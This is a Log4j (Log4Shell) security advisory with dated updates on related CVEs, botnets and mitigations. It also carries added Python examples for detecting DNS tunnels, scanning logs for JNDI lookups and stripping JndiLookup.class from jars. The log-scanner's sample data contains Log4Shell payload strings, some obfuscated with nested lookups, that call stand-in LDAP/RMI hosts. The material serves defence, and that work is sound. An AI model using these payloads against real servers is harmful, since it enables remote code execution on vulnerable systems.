Summary
UPDATE, 15 March 2022
360Netlab recently released a blog indicating that their honeypot system
captured an unknown ELF file propagated through the Log4j vulnerability. This
ELF file triggered an alarm indicating a suspected DNS tunnel. The analysis
determined that it is a new botnet family that analysts dubbed B1txor20, based on the file
name "b1t" used in its propagation, the XOR encryption algorithm, and
the 20-byte RC4 algorithm key length.
B1txor20 is a backdoor Trojan for the Linux platform that uses DNS Tunnel
technology to build a command-and-control (C2) channel. In addition to
traditional backdoor functionality, B1txor20 'also has functions such as
enabling Socket5 proxy, downloading and installing Rootkit remotely, and
rebounding Shell'. An affected device could be used as a jumping-off point for
further exploitation of the network.
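A first-pass heuristic for the kind of "suspected DNS tunnel" alarm described above, as an added example that is not part of the original report or of 360Netlab's honeypot tooling: per domain it measures how many distinct names were queried and how long and random the leftmost label looks, since C2 over DNS encodes its data in many unique, high-entropy subdomains. The resolver records, client addresses, domains and thresholds are constructed or assumed for the example, and grouping by "the last two labels" is a simplification of a public-suffix lookup.

```python
# Added example (not from the advisory): heuristic DNS-tunnel detection over
# constructed resolver records. Thresholds and record layout are assumptions.
import math
from collections import defaultdict

# Constructed base label: 40 hex characters with an even spread of symbols.
_BASE = "0123456789abcdef0f1e2d3c4b5a69788796a5b4"

# Constructed resolver records: (client, queried name, record type).
SAMPLE_DNS_LOG = [
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "cdn.example.com", "A"),
    ("10.0.0.5", "mail.example.com", "MX"),
] + [
    # six unique, rotated 40-character labels under one domain, as a tunnel produces
    ("10.0.0.9", f"{_BASE[i:] + _BASE[:i]}.t1.example.net", "TXT")
    for i in (0, 7, 14, 21, 28, 35)
]


def entropy(s):
    """Shannon entropy of a string in bits per character."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable(qname):
    """Simplified registrable domain: the last two labels (assumption, not PSL-aware)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname.lower()


def profile(records):
    """Per-domain statistics a tunnel would distort: name churn, label length, entropy."""
    acc = defaultdict(lambda: {"queries": 0, "names": set(), "lens": [], "ents": []})
    for _client, qname, _qtype in records:
        d = acc[registrable(qname)]
        leftmost = qname.split(".")[0]
        d["queries"] += 1
        d["names"].add(qname.lower())
        d["lens"].append(len(leftmost))
        d["ents"].append(entropy(leftmost))
    stats = {}
    for domain, d in acc.items():
        q = d["queries"]
        stats[domain] = {
            "queries": q,
            "unique_names": len(d["names"]),
            "unique_ratio": len(d["names"]) / q,
            "avg_label_len": sum(d["lens"]) / q,
            "avg_entropy": sum(d["ents"]) / q,
        }
    return stats


def suspected_tunnels(records, min_queries=5, min_unique_ratio=0.8,
                      min_label_len=24, min_entropy=3.0):
    """Domains whose query pattern crosses every (illustrative) threshold at once."""
    stats = profile(records)
    return sorted(
        domain for domain, s in stats.items()
        if s["queries"] >= min_queries
        and s["unique_ratio"] >= min_unique_ratio
        and s["avg_label_len"] >= min_label_len
        and s["avg_entropy"] >= min_entropy
    )


if __name__ == "__main__":
    for domain, s in profile(SAMPLE_DNS_LOG).items():
        print(domain, s)
    print("suspected:", suspected_tunnels(SAMPLE_DNS_LOG))
```

In practice these statistics are computed per client and per time window, and CDN or anti-virus lookup domains that legitimately produce long labels are allow-listed before alerting, otherwise the unique-name ratio alone generates noise.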
UPDATE, 31 January 2022
Researchers recently published a blog detailing suspected active exploitation of
UniFi Network applications. The first observed successful exploitation was on
20 January 2022; a proof-of-concept (PoC) for this exploit was released on 24
December 2021.
These attacks are similar to those that the same researchers detailed targeting VMware Horizon leveraging
the Log4j vulnerability, CVE-2021-44228.
However, researchers note that these attacks are unique in that the
command-and-control (C2) used, a Cobalt Strike beacon C2, was the same as was used in the SolarWinds supply chain
attack and has been attributed to TA505 (also known as GRACEFUL SPIDER), a well-known financially
motivated threat group.
UPDATE, 28 December 2021
A fifth vulnerability related to Log4j has recently been disclosed. CVE-2021-44832 is an RCE vulnerability
with a moderate severity rating (CVSS: 6.6) and is due to the lack of additional controls on JNDI
access in Log4j. This vulnerability affects all versions from 2.0-alpha7 to
2.17.0, excluding 2.3.2 and 2.12.4.
Apache has released version 2.17.1 to remediate. Users are encouraged to
update to this latest version after appropriate testing is completed.
UPDATE, 27 December 2021
CISA, along with other security organizations, recently released scanners to
identify Log4j vulnerabilities. The open-source tool is derived from scanners
created by other members of the security community and is designed to help
organizations determine if they have vulnerable web services affected by the
critical Log4j vulnerabilities. This scanner is located on CISA's public GitHub
repository, and scans for two major Log4j vulnerabilities, tracked as
CVE-2021-44228 and CVE-2021-45046. CISA stated that this scanner supports DNS
callback for vulnerability discovery and validation as well.
UPDATE, 22 December 2021
Today CISA, the FBI, the NSA, the Australian Cyber Security Centre (ACSC), the Canadian
Centre for Cyber Security (CCCS), the Computer Emergency Response Team New
Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC),
and the United Kingdom's National Cyber Security Centre (NCSC-UK) released a
joint alert to provide additional guidance in
mitigating vulnerabilities pertaining to Apache’s Log4j software library.
This alert expands on previously published guidance by "detailing steps
that vendors and organizations with IT and/or cloud assets should take to
reduce the risk posed by these vulnerabilities."
These steps include:
- Identifying assets affected by Log4Shell and other
Log4j-related vulnerabilities
- Upgrading Log4j assets and affected products to the
latest version as soon as patches are available and remaining alert to
vendor software updates
- Initiating hunt and incident response procedures to
detect possible Log4Shell exploitation.
This alert also provides additional guidance for affected organizations with
operational technology (OT)/industrial control systems (ICS) assets.
UPDATE, 21 December 2021
It has been recently discovered that the Log4j vulnerability is
now being exploited to infect Windows devices with the Dridex banking Trojan
and Linux devices with Meterpreter.
Researchers state that threat actors use the Log4j RMI (Remote Method
Invocation) exploit variant to force vulnerable devices to load and execute a
Java class from an attacker-controlled remote server. Successful execution
allows installation of the Dridex Trojan or Meterpreter once the targeted device
is identified as running Windows or Linux.
Dridex is known for targeting online banking users to steal their
credentials. More recent variants of Dridex have additional capabilities such
as conducting surveillance activities, uploading additional malware, and
propagating to other devices.
Successful deployment of either Dridex or Meterpreter could allow attackers
to deploy further payloads or remotely execute commands on an affected device.
UPDATE, 20 December 2021
Another vulnerability in Log4j has been identified. CVE-2021-45105, rated as high
severity (CVSS: 7.5),
could allow an attacker with control over Thread Context Map data to cause a
DoS condition.
CVE-2021-45105 does not exploit the same weakness as the initial Log4j
vulnerability: it abuses Context Map lookups, rather than the JNDI lookups to an
LDAP server that let attackers execute whatever code is returned in the
Log4Shell vulnerability. This vulnerability affects all
versions of the tool from 2.0-beta9 to 2.16, but only appears to affect
non-default configurations.
Apache released its newest update, 2.17.0, to mitigate the newest
vulnerabilities.
UPDATE, 17 December 2021
New details regarding Log4j continue to emerge.
Two additional vulnerabilities related to Log4j have been observed and
detailed. As of the time of this writing, there are four vulnerabilities
associated with Log4j (the original one is also known as LogJam and Log4Shell):
- CVE-2021-44228 is the original Log4j vulnerability, rated as critical (CVSS: 10.0)
- CVE-2021-45046 is a Denial of Service (DoS) vulnerability. Previously considered a low severity
vulnerability (CVSS: 3.7), CVE-2021-45046 has been recently updated as critical (CVSS: 9.0)
- CVE-2021-4104 affects the non-default configurations of Log4j 1.x instances and is considered a high
severity vulnerability (CVSS: 8.1)
- CVE-2021-42550 is a vulnerability in the Logback logging framework, a successor to the Log4j 1.x library, and
is rated as medium severity (CVSS: 6.6)
Researchers strongly recommend updating to version 2.16.0, and organizations
are urged to continue to monitor Apache's Log4j advisory page for updates.
In addition, CISA today issued an emergency directive directing
federal civilian executive branch (FCEB) agencies to address Log4j
vulnerabilities.
While the CISA Emergency Directive applies directly to federal civilian
executive branch agencies, it does demonstrate the level of attention CISA is
placing on these vulnerabilities and their recommended mitigating actions. For
additional details, see CISA's webpage Apache Log4j Vulnerability Guidance.
New studies also show that attackers - from cybercriminals,
including newly identified Conti ransomware actors targeting
VMware servers, to nation-state actors - have attempted to exploit Log4j
vulnerabilities on almost half of global networks.
UPDATE, 15 December 2021
A second vulnerability in Log4j was recently discovered. Tracked as CVE-2021-45046 with a CVSS score of
3.7, this vulnerability affects all versions of Log4j through version 2.15.0.
Apache has released version 2.16.0 in response; it is
now recommended organizations apply the latest patch version 2.16.0, as version
2.15.0 was deemed incomplete. Apache stated in this latest advisory that the
incomplete patch for CVE-2021-44228 could be abused to "craft malicious
input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS)
attack."
UPDATE, 14 December 2021
CISA states that they, along with partners, are tracking and responding to
the active, widespread exploitation of this critical RCE vulnerability, thought
to potentially affect millions of organizations and hundreds of millions of
devices across a variety of enterprises and industries.
As a result, CISA created a website devoted to guidance related to the
Log4j vulnerability. This website will be actively maintained with a
community-sourced GitHub repository of publicly available
information and vendor-supplied advisories.
Of note, Log4j is now being viewed as 'fully weaponized' and being actively
exploited by what at least two security firms suggest are Chinese government
hacking groups.
UPDATE, 13 December 2021
Additional details continue to roll in on the critical zero-day
vulnerability affecting several versions of Apache’s Log4j, CVE-2021-44228.
Over the weekend, researchers published a blog detailing their observations on how
attackers are attempting to exploit this vulnerability, including variations in
attack methods and obfuscation methods in attempts to hide within ‘normal’
network traffic.
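As an added example (not from the original post or from the researchers' blog) of the detection side of the observations above, the following Python scans web-server access-log lines for Log4j lookup strings, collapses the nested lower/upper/default-value lookups that are used to disguise the string "jndi" inside otherwise normal-looking requests, and reports the callback scheme and host. The log lines, IP addresses and hostnames are constructed for the example, and the set of nesting forms it resolves is an assumption that covers the common cases only.

```python
# Added example (not from the advisory): detect Log4j JNDI lookup strings in
# access-log lines, including nested-lookup obfuscation. Sample data is constructed.
import re

INNERMOST = re.compile(r"\$\{([^${}]*)\}")              # a ${...} with no nested lookup
JNDI_REF = re.compile(r"jndi:\s*([a-z]+)://([^/:\s}\]]+)", re.I)
JNDI_ANY = re.compile(r"jndi:", re.I)

# Constructed Apache-style access log; 203.0.113.0/24 and example.net are documentation ranges.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://c2.example.net:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:j}${lower:n}di:${lower:l}dap://c2.example.net/b} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.11 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}ndi:rmi://198.51.100.20:1099/x}"',
]


def resolve_lookup(expr):
    """Statically evaluate one innermost lookup for the forms that carry no
    runtime data; return None when it cannot be resolved offline."""
    low = expr.lower()
    if low.startswith("lower:"):
        return expr[6:].lower()
    if low.startswith("upper:"):
        return expr[6:].upper()
    if ":-" in expr:                         # ${key:-default} -> default (key may be empty)
        return expr.split(":-", 1)[1]
    return None                              # e.g. jndi:..., left in place


def normalize(text, max_rounds=16):
    """Collapse nested lookups from the inside out until nothing else resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = resolve_lookup(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines):
    """One finding per line that still contains a JNDI lookup after normalisation."""
    findings = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if not JNDI_ANY.search(norm):
            continue
        m = JNDI_REF.search(norm)
        findings.append({
            "line": n,
            "scheme": m.group(1).lower() if m else None,
            "host": m.group(2) if m else None,
            "obfuscated": norm != line,      # nesting had to be unwound to see it
            "normalized": norm,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_ACCESS_LOG):
        print(f["line"], f["scheme"], f["host"], "obfuscated" if f["obfuscated"] else "plain")
```

The reported scheme and host are the useful pivot points for the hunt procedures mentioned later in this advisory: the host is what an affected server would have connected out to, so correlating it against proxy, firewall and DNS logs shows whether a logged attempt actually succeeded.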
Additional research shows that CVE-2021-44228 is being
leveraged to form new botnets. Two have been identified – a Muhstik botnet and
a Mirai botnet – both being used to target Linux devices.
In addition, coin miners are now attempting to exploit this vulnerability
for their purposes.
In fact, mass scanning attempts aiming to deploy coin miners or malware for
building botnets have been observed. This could be considered 'sophisticated
activity,' potentially from an advanced persistent threat (APT) actor or a
state-sponsored actor.
Again, Apache has released Log4j version 2.15 which contains a fix for this
CVE. It is recommended to immediately upgrade to this version once appropriate testing
has been completed in your environment.
Researchers recommend that, if your organization is unable to apply the
patches, you can mitigate this vulnerability as follows:
- For versions 2.0 and before 2.10, Apache recommends
removing the JndiLookup class from the classpath by running:
  zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- For versions 2.10 and above, set the system property log4j2.formatMsgNoLookups
to true, or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
- If you cannot do any of the above, you can block all
outbound LDAP or RMI connections using Application Identity filters.
Juniper SRX NG Firewall provides AppID signatures for both protocols.
Some researchers also recommend web application firewalls (WAF) - though
these are not considered foolproof - as well as outbound egress filtering and
allow listing.
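The class-removal mitigation above, worked through in Python as an added example that is not part of the original advisory or of Apache's own tooling: it reads a log4j-core jar's version from its Maven metadata, maps that version onto the CVE ranges stated in this advisory, and writes a copy of the jar with JndiLookup.class removed, which is what the zip command does in place. The jar it inspects is constructed in a temporary directory with dummy class bodies; the version mapping is simplified to the 2.x main line and ignores the 2.3.x and 2.12.x backport releases, and the file names are assumptions.

```python
# Added example (not from the advisory): inspect a log4j-core jar, report the
# advisory's CVEs for its version, and write a copy without JndiLookup.class.
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0).
    The last element sorts a pre-release before the matching final release."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?", text)
    if not m:
        raise ValueError(f"unrecognised version: {text}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def read_version(jar_path):
    """Version string from the jar's Maven pom.properties, or None if absent."""
    with zipfile.ZipFile(jar_path) as zf:
        if POM_PROPS not in zf.namelist():
            return None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def applicable_cves(version):
    """Map a log4j-core version onto the CVE ranges stated in this advisory
    (simplified: 2.x main line only, backport branches not modelled)."""
    v = parse_version(version)
    first = parse_version("2.0-beta9")
    cves = []
    if first <= v <= parse_version("2.14.1"):
        cves.append("CVE-2021-44228")      # Log4Shell RCE, fixed in 2.15.0
    if first <= v <= parse_version("2.15.0"):
        cves.append("CVE-2021-45046")      # incomplete fix, fixed in 2.16.0
    if first <= v < parse_version("2.17.0"):
        cves.append("CVE-2021-45105")      # Context Map lookup DoS, fixed in 2.17.0
    if (parse_version("2.0-alpha7") <= v <= parse_version("2.17.0")
            and version not in ("2.3.2", "2.12.4")):
        cves.append("CVE-2021-44832")      # JNDI access controls, fixed in 2.17.1
    return cves


def assess(jar_path):
    """What a defender needs to know about one jar: version, CVEs, JndiLookup presence."""
    version = read_version(jar_path)
    with zipfile.ZipFile(jar_path) as zf:
        has_jndi = JNDI_CLASS in zf.namelist()
    return {
        "jar": os.path.basename(jar_path),
        "version": version,
        "has_jndi_lookup": has_jndi,
        "cves": applicable_cves(version) if version else [],
    }


def strip_jndi_lookup(src, dst):
    """Write dst as a copy of src without JndiLookup.class and verify the result.
    Equivalent to the advisory's 'zip -q -d ... JndiLookup.class', done out of place."""
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for info in zin.infolist():
            if info.filename == JNDI_CLASS:
                continue
            zout.writestr(info, zin.read(info.filename))
    with zipfile.ZipFile(dst) as check:
        return JNDI_CLASS not in check.namelist()


def make_sample_jar(path, version="2.14.1"):
    """Constructed stand-in for a real log4j-core jar (class bodies are dummies)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return path


def demo():
    """Build a sample jar, assess it, apply the class removal, and assess the copy."""
    workdir = tempfile.mkdtemp()
    vulnerable = make_sample_jar(os.path.join(workdir, "log4j-core-2.14.1.jar"))
    mitigated = os.path.join(workdir, "log4j-core-2.14.1.mitigated.jar")
    before = assess(vulnerable)
    stripped = strip_jndi_lookup(vulnerable, mitigated)
    after = assess(mitigated)
    # The version string is unchanged, so version-based scanners still flag the
    # mitigated jar; only upgrading clears the CVE list.
    return {"before": before, "after": after, "stripped": stripped}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Removing the class is a stopgap: the mitigated jar still reports its original version, so inventory scanners will keep flagging it, and the application needs a restart for the change to take effect. Record where the class was removed so those jars are not mistaken for patched ones, and replace them with 2.17.1 once testing allows.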
Indicators of Compromise (IoCs) and additional mitigation recommendations
are available at the research sites mentioned above. In addition, further
details regarding known vulnerable software are available here, and details regarding exploitation
detection are available here.
Original Content
Apache recently released a security advisory to address a
vulnerability in its Log4j Java library, an open source logging utility that's
used in countless apps, including those used by large enterprise organizations
and cloud services.
A remote code execution (RCE) vulnerability that does not require
authentication, CVE-2021-44228, dubbed Log4Shell or
LogJam, affects Log4j versions 2.0-beta9 to 2.14.1. This vulnerability is
considered critical and has been assigned a CVSS score of 10.0.
A remote attacker could exploit this vulnerability to take control of an
affected system.
Researchers initially reported this vulnerability to Apache on
November 24, indicating that CVE-2021-44228 also impacts default configurations
of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache
Druid, Apache Flink, and others.
A proof-of-concept (PoC) exploit was published on GitHub yesterday; threat
actors immediately began scanning the internet for vulnerable hosts and
networks.
Along with Apache and the US CISA, the New Zealand Computer Emergency Response
Team (CERT NZ) issued a security advisory warning of
active exploitation in the wild.
Further, other researchers believe that "Similarly to other
high-profile vulnerabilities such as Heartbleed and Shellshock, we believe
there will be an increasing number of vulnerable products discovered in the
weeks to come."
It is likely that many threat actors, including ransomware actors, will
begin leveraging this vulnerability immediately.
Analysis
Affected Versions
This vulnerability impacts Log4j versions 2.0-beta9 to 2.14.1, as well as
default configurations of multiple Apache frameworks, including Apache Struts2,
Apache Solr, Apache Druid, and Apache Flink.
Potential Impact
Successful exploitation of this vulnerability could allow complete system
takeover on vulnerable systems.
Recommendations
Apache released an update to address this vulnerability.
CISA encourages users and administrators to review the Apache Log4j 2.15.0
Announcement and upgrade to Log4j 2.15.0 or apply the recommended
mitigations immediately.
Clients are recommended to update to the most recent version after appropriate
evaluation and testing have been completed.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://logging.apache.org/log4j/2.x/security.html
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
https://protect-eu.mimecast.com/s/7LIkCWnxXIDKZWo5HxkFaf?domain=mail-archives.us.apache.org
https://github.com/tangxiaofeng7/apache-log4j-poc
https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/
https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
https://github.com/NCSC-NL/log4shell/tree/main/software
https://www.govinfosecurity.com/serious-log4j-security-flaw-race-underway-to-discern-scope-a-18107
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://www.zdnet.com/article/log4j-flaw-nearly-half-of-corporate-networks-have-been-targeted-by-attackers-trying-to-use-this-vulnerability/#ftag=RSSbaffb68
https://nvd.nist.gov/vuln/detail/CVE-2021-42550
https://nvd.nist.gov/vuln/detail/CVE-2021-4104
https://www.cisa.gov/emergency-directive-22-02
https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/
https://nvd.nist.gov/vuln/detail/CVE-2021-45105
https://logging.apache.org/log4j/2.x/download.html
https://heimdalsecurity.com/blog/dridex-malware-installed-with-the-help-of-log4j-vulnerability/
https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
https://github.com/cisagov/log4j-scanner
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832
https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications
https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk
https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/
https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_cn/